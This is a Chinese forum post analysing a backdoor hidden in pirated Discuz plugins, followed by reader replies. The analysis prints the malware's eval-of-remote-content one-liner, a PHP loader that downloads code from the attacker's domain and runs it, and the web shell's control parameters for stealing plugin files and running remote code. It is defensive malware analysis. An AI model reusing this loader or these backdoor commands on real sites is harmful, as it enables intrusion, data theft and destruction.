您認(rèn)為你的網(wǎng)站還很安全嗎？風(fēng)靡全網(wǎng)的Discuz盜版插件后門(mén)木馬你了解過(guò)嗎？

lovetvb

在曝光這個(gè)后門(mén)木馬之前，我們考慮了很久要不要曝光，這個(gè)后門(mén)我們?nèi)ツ昃鸵呀?jīng)發(fā)現(xiàn)了，而且第一時(shí)間公布到群里面！在群里的用戶(hù)可能很早都知道這個(gè)后門(mén)！

但是始終沒(méi)有曝光在網(wǎng)站內(nèi)！原因是從這個(gè)后門(mén)的復(fù)雜程度來(lái)看，此人不簡(jiǎn)單！我們不想惹！并不是我們怕！明著來(lái)我們不怕什么！

明槍易躲，暗箭難防！唯女子與小人為難養(yǎng)也！

正文開(kāi)始：

---

這個(gè)后門(mén)樣本是最早發(fā)現(xiàn)在飛*房產(chǎn)(后門(mén)和插件作者無(wú)關(guān)，正版的無(wú)此后門(mén))  后來(lái)我們又在用戶(hù)給我們提供的插件里面根據(jù)關(guān)鍵詞 發(fā)現(xiàn)很多都帶這個(gè)后門(mén)，

那么下面我們開(kāi)始分析：本次樣本為 克*APP 3.51(后門(mén)和插件作者無(wú)關(guān)，正版的無(wú)此后門(mén))，因?yàn)榫嚯x第一次發(fā)現(xiàn)太久，那個(gè)樣本沒(méi)有了！

首先我們是在一個(gè)模板文件發(fā)現(xiàn)了異常(如圖)

1. eval(dfsockopen($commen))

復(fù)制代碼

很明顯的一句話(huà)后門(mén)。但是整個(gè)文件就這一行代碼！沒(méi)有一句話(huà)應(yīng)有的參數(shù)！而 $commen 這個(gè)變量也并未在這個(gè)文件賦值， 全文件找了下發(fā)下在下面這個(gè)文件有 $commen  變量的賦值

function_comiis_load.php

但是這個(gè)值經(jīng)過(guò)了一系列“混淆”，我們一步步來(lái)?yè)荛_(kāi)這個(gè)煙霧彈

1. $title=dfsockopen($url);

復(fù)制代碼

這里有個(gè)遠(yuǎn)程請(qǐng)求！那么我們把這個(gè) $url 變量調(diào)試出來(lái)，先把代碼搬過(guò)來(lái)

調(diào)試得到 $url 的值為：

1. ://94203.vip/20190305.png

復(fù)制代碼

這里已經(jīng)是個(gè)正常的鏈接了，我們獲取這個(gè)文件的內(nèi)容試試(也可以通過(guò)瀏覽器的下載功能直接下載這個(gè)圖片，然后通過(guò)記事本打開(kāi))

1. moqu8ctrlabcctrl://ctrl.ctrl/ctrl[A-Z_].*[A-Z_]ctrlecho "990";ctrl./config.phpctrl6692ctrlhttpABc94203`akndecryptud^gjchdh`vipNULLB{NVJ:GJGbaiduseofn`lpsck`xmlctrl`.*?`ctrl6692ctrlhttpABc94203`akndecryptud^gjchdh`vipNULLB{NVJ:GJGbaiduseoff`lpsck`xmlctrl./baiduin.phpctrltemplate/index.htmlctrlpic.png
   

復(fù)制代碼

繼續(xù)對(duì)這串不知道什么玩意的內(nèi)容進(jìn)行整理(直接搬后門(mén)的代碼過(guò)來(lái)取值就是)

得到內(nèi)容

1. http://94203.vip/baiduseofn.xmlCopy

復(fù)制代碼

繼續(xù)往下調(diào)試，發(fā)現(xiàn)緊跟的這幾段是讓代碼看起來(lái)像一個(gè)正常代碼，其實(shí)并無(wú)實(shí)際用途！都是一些賦值然后其實(shí)并不會(huì)調(diào)用，也許后面會(huì)用到先放這里不做分析

1. list(,,, $tagid, $type,$page ) = func_get_args();
   
2.     $rewriterules=$_G['cache']['plugin']['comiis_app'];
   
3.         $identifier=substr($_GET['id'],0,strpos($_GET['id'], ':'))?substr($_GET['id'],0,strpos($_GET['id'], ':'));$_GET['id'];
   
4.         $plugin['identifier']=$plugin['identifier']?$plugin['identifier'];$identifier;

復(fù)制代碼

緊隨其后的是，翻譯出來(lái)看看是判斷什么 然后調(diào)用了什么文件！

因?yàn)?$tag 前面已經(jīng)取了這個(gè)的值，我們直接調(diào)用，打印出內(nèi)容看看

得到一個(gè)數(shù)組

1. Array
   
2. (
   
3.     [0] => moqu8
   
4.     [1] => abc
   
5.     [2] => ://
   
6.     [3] => .
   
7.     [4] => /
   
8.     [5] => [A-Z_].*[A-Z_]
   
9.     [6] => echo "990";
   
10.     [7] => ./config.php
    
11.     [8] => 6692
    
12.     [9] => httpABc94203`akndecryptud^gjchdh`vipNULLB{NVJ:GJGbaiduseofn`lpsck`xml
    
13.     [10] => `.*?`
    
14.     [11] => 6692
    
15.     [12] => httpABc94203`akndecryptud^gjchdh`vipNULLB{NVJ:GJGbaiduseoff`lpsck`xml
    
16.     [13] => ./baiduin.php
    
17.     [14] => template/index.html
    
18.     [15] => pic.png
    
19. )

復(fù)制代碼

這樣就很容易翻譯那段代碼的意思得到結(jié)果為：

1. if(@filesize('./config.php') != '6692'){ @include_once DISCUZ_ROOT.'./source/plugin/comiis_app/'.'template/index.html';}

復(fù)制代碼

這句話(huà)翻譯成大白話(huà)的意思就是  如果 ./config.php 文件的大小 不等于 6692 字節(jié)  則引用 template/index.html 這個(gè)文件 注意到了嗎？ template/index.html 這個(gè)文件正式我們一開(kāi)始發(fā)現(xiàn)端倪的文件

現(xiàn)在插件是第一次運(yùn)行，./config.php文件是不存在的 所以大小肯定是不等于 6692 的，所以我們繼續(xù)調(diào)試！來(lái)到 template/index.html 這個(gè)文件

1. eval(dfsockopen($commen))
   

復(fù)制代碼

這句代碼意思是 先讀取遠(yuǎn)程鏈接返回的內(nèi)容，然后執(zhí)行！ $commen  這個(gè)變量的值我們前面已經(jīng)知道了 就是下面的內(nèi)容 (我們可以通過(guò)瀏覽器訪(fǎng)問(wèn)這個(gè)鏈接，然后右鍵查看源碼，得到這個(gè)文件所返回的內(nèi)容)

1. http://94203.vip/baiduseofn.xml

復(fù)制代碼

返回內(nèi)容如下：

也就是說(shuō) 即將執(zhí)行的代碼就是這段代碼，復(fù)制下來(lái) 調(diào)試一波,順便美化一下，方便閱讀

1. function content($svip)
   
2. {
   
3.     ini_set('max_execution_time', '0');
   
4.     if (function_exists('file_get_contents')) {
   
5.         $data = file_get_contents($svip);
   
6.     } else {
   
7.         $ch = curl_init();
   
8.         $timeout = 5;
   
9.         curl_setopt($ch, CURLOPT_URL, $svip);
   
10.         curl_setopt($ch, CURLOPT_HEADER, 0);
    
11.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    
12.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    
13.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    
14.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
15.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
16.         $data = curl_exec($ch);
    
17.         curl_close($ch);
    
18.     }
    
19.     return $data;
    
20. }
    
21. $svip = preg_replace(array("/" . $tag[10] . "/", "/" . $tag[1] . "/i", "/" . $tag[5] . "/"), array($tag[3], $tag[2], $tag[4]), $tag[12]);
    
22. if (content($svip)) {
    
23.     file_put_contents($tag[13], content($svip));
    
24.     require_once $tag[13];
    
25. }
    

復(fù)制代碼

因?yàn)榇a中依然用到了 $tag 變量，所以我們繼續(xù)放之前的調(diào)試文件調(diào)試，我們先來(lái) 取  $svip 這個(gè)變量對(duì)應(yīng)的值，得到一個(gè)鏈接

1. http://94203.vip/baiduseoff.xml

復(fù)制代碼

之前我們已經(jīng)打印了 $tag 的內(nèi)容  可以得到  $tag[13] 的內(nèi)容就是 ./baiduin.php

繼續(xù)放下調(diào)試 翻譯出來(lái)的大白話(huà)意思就是 如果遠(yuǎn)程訪(fǎng)問(wèn) 上面的 的鏈接 返回的內(nèi)容不是空的 則寫(xiě)入 返回的內(nèi)容到文件 ../baiduin.php 并且馬上引用這個(gè)文件
既然又要引用新文件，那么我們就得看看這個(gè)文件的內(nèi)容了 (我們可以通過(guò)瀏覽器訪(fǎng)問(wèn)這個(gè)鏈接，然后右鍵查看源碼，得到這個(gè)文件所返回的內(nèi)容) 其實(shí)這里和前面一個(gè)步驟很像，
你也可以理解成是一層殼！得到一個(gè)比較大的文件了(如圖)，有種預(yù)感，馬上要正式進(jìn)入后門(mén)的領(lǐng)域了，前面一系列操作其實(shí)都是煙霧彈

內(nèi)容太長(zhǎng)就不粘貼出來(lái)了 感興趣的可以下載下面的附件(代碼為了方便閱讀，美化過(guò)，其實(shí)你也可以訪(fǎng)問(wèn)下面的鏈接得到這個(gè)文件樣本)

游客，如果您要查看本帖隱藏內(nèi)容請(qǐng)回復(fù)

其實(shí)這個(gè)文件是進(jìn)行了簡(jiǎn)單加密的。我們給他解密！因?yàn)槭潜容^簡(jiǎn)單的加密，而且我們這次的重點(diǎn)不是講解加密與解密。下面直接上圖解密，就不講解了

得到解密后的文件

調(diào)試木馬

---

我們調(diào)試這個(gè)文件，因?yàn)槲也皇?在dz環(huán)境調(diào)試的，但是這個(gè)文件用到了dz自帶的幾個(gè)函數(shù) 我們copy過(guò)來(lái)在調(diào)試

調(diào)試前先把已知的數(shù)據(jù)講解下

如果文件./web.php 存在 就刪除這個(gè)文件，前面的代碼都是構(gòu)造變量，在這句之前用不到

這里的 $identifier 是插件的 標(biāo)識(shí)，代碼因?yàn)槭窃诓寮锩孢\(yùn)行的，所以這個(gè)變量是dz賦值的$plugin['identifier']，比如我們現(xiàn)在的樣本是 comiis_app 那么這個(gè)值就是  'comiis_app' 繼續(xù)調(diào)試

這里開(kāi)始引用了上面的幾個(gè)變量，我們把變量輸出看看分別是什么

得到這2個(gè)變量分別是

1. ./config.php
   
2. http://94203.vip/index.txt

復(fù)制代碼

其實(shí)從這里開(kāi)始感覺(jué)分析這個(gè)后門(mén)已經(jīng)花了很長(zhǎng)時(shí)間了，有點(diǎn)累，寫(xiě)的都比較隨意了！可能大家都開(kāi)始看不懂了，還是保持開(kāi)始的狀態(tài)繼續(xù)寫(xiě)！分析起來(lái)其實(shí)很快，主要是要寫(xiě)，就慢了。 得到這2個(gè)變量的值，我們翻譯下上面那段邏輯代碼

1. 如果 (文件./config.php不存在 且 遠(yuǎn)程請(qǐng)求http://94203.vip/index.txt的內(nèi)容不是空) {
   
2. 
   
3.     遠(yuǎn)程訪(fǎng)問(wèn)("http://q.94203.vip/5r.php?u=你的域名&r=comiis_app";
   
4. 
   
5.     寫(xiě)入文件(./config.php, 遠(yuǎn)程訪(fǎng)問(wèn)http://94203.vip/index.txt返回的內(nèi)容);
   
6. 
   
7. } 或者如果 (文件./config.php字節(jié)大小 不等于 6692 且 遠(yuǎn)程請(qǐng)求http://94203.vip/index.txt的內(nèi)容不是空) {
   
8. 
   
9.     寫(xiě)入文件(./config.php, 遠(yuǎn)程訪(fǎng)問(wèn)http://94203.vip/index.txt返回的內(nèi)容);
   
10. 
    
11. } 或者如果(文件"插件目錄/log.txt"不存在 且  插件不是csdn123_news和csdn123com_toutiao) {
    
12. 
    
13.     遠(yuǎn)程訪(fǎng)問(wèn)("http://q.94203.vip/5r.php?u=你的域名&r=comiis_app";
    
14. 
    
15.     寫(xiě)入文件(插件目錄/log.txt, 空的內(nèi)容);
    
16. 
    
17. 
    
18. }

復(fù)制代碼

不知道這樣的代碼結(jié)構(gòu) 對(duì)于不懂PHP的 能不能看懂，懂PHP的直接看源代碼就可以。繼續(xù)調(diào)試下面的代碼

首先輸出這個(gè)變量 $deindex

得到 這個(gè)變量的值為 ./index.bak.php，我們繼續(xù)用上面的方式翻譯上面的這段邏輯代碼

1. 如果 (文件./index.bak.php存在) {
   
2.     刪除文件./index.bak.php;
   
3. }
   
4. 如果 (文件/source/function/function_ajax.php大小 不等于 14798) {
   
5.    如果(遠(yuǎn)程訪(fǎng)問(wèn)鏈接http://q.94203.vip/function_cloudaddons.xml返回的不是空內(nèi)容 ){
   
6.         寫(xiě)到文件/source/function/function_ajax.php 內(nèi)容是 遠(yuǎn)程訪(fǎng)問(wèn)鏈接http://q.94203.vip/function_cloudaddons.xml返回的內(nèi)容
   
7.     }
   
8. }
   
9. 刪除文件./baiduin.php

復(fù)制代碼

到這里已經(jīng)開(kāi)始了 系統(tǒng)文件替換了，其實(shí)到這里基本上就結(jié)束了，看著是不是好像沒(méi)有什么大問(wèn)題？只是替換了一個(gè)系統(tǒng)文件和寫(xiě)了一個(gè)./config.php文件？
先別急著關(guān)閉頁(yè)面，因?yàn)橄旅娌攀侵仡^戲！我們繼續(xù)分析寫(xiě)入的這2個(gè)文件 從 ./config.php 開(kāi)始，這個(gè)文件寫(xiě)入的是 http://94203.vip/index.txt 返回的內(nèi)容 我們用瀏覽器打開(kāi) 得到文件代碼如圖

去掉 用于混淆 讓人覺(jué)得是正常文件的內(nèi)容 得到代碼

為什么那一段是沒(méi)用的？因?yàn)槿绻ＴL(fǎng)問(wèn) 其實(shí)這就是dz自帶的 index.php文件復(fù)制過(guò)來(lái)的 后門(mén)控制者訪(fǎng)問(wèn)時(shí)如果在鏈接后面加了 ?s=1 就會(huì)執(zhí)行圖片上的代碼

翻譯出來(lái)的意思就是

1. 執(zhí)行代碼(  遠(yuǎn)程請(qǐng)求 {域名}/baiduindex.xml 返回的內(nèi)容 )

復(fù)制代碼

這里的域名 是通過(guò)GET參數(shù)獲取，也就是說(shuō) 如果控制住域名忘記續(xù)費(fèi) 根本沒(méi)有關(guān)系 比如 作者 通過(guò)這樣的形式訪(fǎng)問(wèn) 你的域名/config.php?s=1&domain=94203.vip 就可以 那么/baiduindex.xml的內(nèi)容是什么，因?yàn)槭强刂普咴诳刂颇憔W(wǎng)站時(shí)輸入的，所以從代碼上得不到這個(gè)文件！但是我們可以靠猜來(lái)試試，果然一猜就中，他用于木馬的域名就文中提到的1個(gè)。試了一下 就出來(lái)了

1. 94203.vip/baiduindex.xml

復(fù)制代碼

得到內(nèi)容(加密了，那就解密看看這個(gè)是個(gè)什么文件吧)

經(jīng)過(guò)N層解密，得到文件

這里已經(jīng)有獲取你網(wǎng)站安裝的插件操作的代碼的了！這個(gè)后門(mén)文件還有很多參數(shù)！等下我們繼續(xù)分析！ 解密后的樣本和原版 在下面的附件 有興趣的可以研究下

游客，如果您要查看本帖隱藏內(nèi)容請(qǐng)回復(fù)

下面繼續(xù)分析，這個(gè)木馬文件的所有參數(shù)（其實(shí)也累了，就不調(diào)試了，直接丟dz環(huán)境跑起來(lái)，然后把代碼有的參數(shù)一個(gè)個(gè)輸進(jìn)去試） 忽然發(fā)現(xiàn) 404，原來(lái)作者還加了 指定瀏覽器功能，也就是說(shuō)只有這個(gè)UA的瀏覽器才能訪(fǎng)問(wèn)，我們刪除這段

木馬參數(shù)

---

參數(shù)1、  你的域名/config.php?s=1&domain=94203.vip&b=header&z=壓縮包名字 打包你網(wǎng)站 ./source/plugin  目錄  即打包插件目錄，然后下載，代碼見(jiàn)下面

參數(shù)2、  你的域名/config.php?s=2&domain=94203.vip 開(kāi)頭涉及到一個(gè)插件 aljjyno 不知道干嘛用的，但是只知道有寫(xiě)入文件的功能！也是遠(yuǎn)程請(qǐng)求，但是這次我們通過(guò)前面方法猜域名，沒(méi)有猜出來(lái)！

緊隨的是 替換/config/config_global.php 網(wǎng)站配置文件(給你開(kāi)啟開(kāi)發(fā)者模式，這樣你安裝插件就不會(huì)自動(dòng)刪除安裝包!不然作者每次打包走的都是沒(méi)有xml的插件估計(jì)也很難受) 接著就是鞏固一下后門(mén)

上面的代碼前面講過(guò) 就是判斷 ./config.php的大小是不是 6692 如果不是就重新生成，防止木馬被你清理或修改 然后 又鞏固了一下 /source/function/function_ajax.php 的地位 這個(gè)文件前面提到了，但是還沒(méi)有分析！等分析玩這個(gè)文件，我們繼續(xù)分析這個(gè) 在往下 就是 獲取你安裝了的插件，然后列出列表吧？如果弄了打包的參數(shù) 就開(kāi)始打包下載

參數(shù)3、  你的域名/config.php?s=3&domain=94203.vip后面還要參數(shù) 不是很重要 這個(gè)就是 下載壓縮包用的，沒(méi)什么可以講解

參數(shù)4、  你的域名/config.php?s=4&domain=94203.vip 上傳文件到你網(wǎng)站任意位置的好像。

參數(shù)5、  你的域名/config.php?s=5&domain=94203.vip&do=1 作用：寫(xiě)入文件

如果帶do參數(shù) 則寫(xiě)入94203.vip/data.xml 的內(nèi)容 瀏覽器訪(fǎng)問(wèn)這個(gè)鏈接 得到的內(nèi)容 是一個(gè)典型的PHP木馬。打包網(wǎng)站用的，導(dǎo)出數(shù)據(jù)庫(kù)啥的 如果沒(méi)有帶do參數(shù) 則寫(xiě)入94203.vip/datatwo.xml 的內(nèi)容 瀏覽器訪(fǎng)問(wèn)這個(gè)鏈接 得到的內(nèi)容 是一個(gè)文件在線(xiàn)管理功能。 2個(gè)樣本在下面壓縮包，感興趣的可以下載看看

游客，如果您要查看本帖隱藏內(nèi)容請(qǐng)回復(fù)

參數(shù)6、  你的域名/config.php?s=6&domain=94203.vip 作用：執(zhí)行遠(yuǎn)程文件 94203.vip/ondata.xml

其實(shí)和 參數(shù)5的帶do參數(shù)功能一樣，可能是防止你服務(wù)器不能寫(xiě)入文件時(shí)  直接用php執(zhí)行用的。應(yīng)該算是備用功能，感興趣的可以下載下面的附件研究

游客，如果您要查看本帖隱藏內(nèi)容請(qǐng)回復(fù)

參數(shù)7、  你的域名/config.php?s=7&domain=94203.vip 作用：下載你網(wǎng)站非壓縮包文件(如直接下載PHP文件)

參數(shù)8、  你的域名/config.php?s=8&domain=94203.vip 作用：執(zhí)行遠(yuǎn)程代碼  94203.vip/tiquxml.xml

遠(yuǎn)程鏈接返回內(nèi)容如下

1. @set_time_limit(0);
   
2. @include_once './config/config_global.php';

復(fù)制代碼

從注釋看好像是提取XML的  到這里 這個(gè)文件的功能基本上分析完畢。你以為就這樣？

結(jié)尾

---

以上涉及到的代碼全部是遠(yuǎn)程執(zhí)行，

代碼后門(mén)作者可以隨時(shí)更改/更新/升級(jí)、等于是給你網(wǎng)站的后門(mén)免費(fèi)提供了免費(fèi)更新的功能 如果他給你來(lái)個(gè)全盤(pán)格式化的遠(yuǎn)程代碼，你懵逼嗎？

如果他給你來(lái)個(gè)清空數(shù)據(jù)庫(kù)的代碼 你懵逼嗎？

分析到這里，我們回到前面提到的 /source/function/function_ajax.php文件 打開(kāi)遠(yuǎn)程獲取到的代碼 分析一波，已經(jīng)不記得前面有沒(méi)有把這個(gè)文件的代碼貼出來(lái)了！

如果沒(méi)有，感興趣的同學(xué)就自己獲取一下！  因?yàn)檫@個(gè)文件是基于dz的系統(tǒng)文件修改的(注入)，我們對(duì)比文件刪除dz原版代碼 得到如下代碼

也就是說(shuō)上面的代碼是后門(mén)作者加進(jìn)去的  其實(shí)這個(gè)文件也沒(méi)啥好分析的，

大概就是：這個(gè)文件因?yàn)閐z需要經(jīng)常調(diào)用，調(diào)用頻率非常的高  只要這個(gè)文件一被調(diào)用  就自動(dòng)從遠(yuǎn)程獲取內(nèi)容94203.vip/index.xml 生成到文件/config.php  這個(gè)文件的代碼前面分析過(guò)。

大概想實(shí)現(xiàn)的目的就是防刪！如果你刪了，又會(huì)出來(lái)。就是你怎么刪也刪不掉/config.php這個(gè)文件，我給他定義為 “不死鳥(niǎo)”  基本上整個(gè)后門(mén)到這里就算分析完畢了！

其實(shí)目前來(lái)講這套木馬想查殺的話(huà) 有一套關(guān)鍵詞可以進(jìn)行匹配！

但是我們這次目的是分析木馬！查殺的任務(wù)，還是得靠站長(zhǎng)自己。

我們只能說(shuō)這種木馬在全網(wǎng)傳播的很普遍！

從各個(gè)資源站到某寶等 都有這個(gè)木馬的影子！

Discuz有償服務(wù)

某趣吧盜版插件含后門(mén)，這是眾所周知的，你回帖貼的鏈接的網(wǎng)站也不是好鳥(niǎo)，一樣的，會(huì)盜取你網(wǎng)站的應(yīng)用

pcyi

雖然不懂但我大為震撼

TaC

雖沒(méi)看懂，感覺(jué)好歷害?，F(xiàn)在已沒(méi)有幾個(gè)人能有這種耐心寫(xiě)這么東西了

gulaibai

我曾經(jīng)遇到過(guò)，他還加我Q，要錢(qián)錢(qián)，我拉黑后，直接就把我的數(shù)據(jù)盤(pán)格了

false001

樓主功力深厚，佩服佩服

false001

gulaibai 發(fā)表于 2023-4-1 12:16
我曾經(jīng)遇到過(guò)，他還加我Q，要錢(qián)錢(qián)，我拉黑后，直接就把我的數(shù)據(jù)盤(pán)格了 ...

把那個(gè)人的QQ暴出來(lái)，讓大家都防著他點(diǎn)。

xiaohuahua123

雖沒(méi)看懂，感覺(jué)好震撼，那有沒(méi)有大佬寫(xiě)個(gè)插件出來(lái)讓大伙查殺下，或許有些站長(zhǎng)的站存在這個(gè)木馬后門(mén)也說(shuō)不定。